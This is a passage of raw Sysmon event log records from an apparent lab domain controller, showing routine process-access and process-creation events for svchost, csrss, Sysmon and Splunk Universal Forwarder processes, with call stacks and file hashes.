+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006924Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:13.781{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006923Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:13.781{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006922Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:13.781{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006921Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:13.781{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7DD9-5FA1-8201-000000008801}2508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006920Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:13.781{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7DD9-5FA1-8201-000000008801}2508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006919Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:13.782{D28789B6-7DD9-5FA1-8201-000000008801}2508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006946Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:14.703{D28789B6-7DDA-5FA1-8301-000000008801}22483100C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006945Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:14.563{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7DDA-5FA1-8301-000000008801}2248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006944Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:14.563{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006943Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:14.563{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006942Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:14.563{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006941Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:14.563{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006940Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:14.563{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006939Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:14.563{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006938Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:14.563{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006937Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:14.563{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006936Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:14.563{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006935Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:14.563{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7DDA-5FA1-8301-000000008801}2248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006934Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:14.563{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7DDA-5FA1-8301-000000008801}2248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006933Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:14.563{D28789B6-7DDA-5FA1-8301-000000008801}2248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006960Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:15.375{D28789B6-7DDB-5FA1-8401-000000008801}39804168C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006959Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:15.234{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7DDB-5FA1-8401-000000008801}3980C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006958Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:15.234{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006957Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:15.234{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006956Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:15.234{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006955Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:15.234{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006954Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:15.234{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006953Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 